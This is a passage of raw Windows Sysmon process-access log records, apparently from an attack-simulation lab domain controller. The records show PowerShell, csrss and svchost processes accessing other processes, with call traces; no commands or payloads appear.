06:55:19.354","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978635cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978e5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98314fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978912fd(wow64)","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5793,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5794,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5795,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5796,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5797,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5798,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5799,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5800,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: 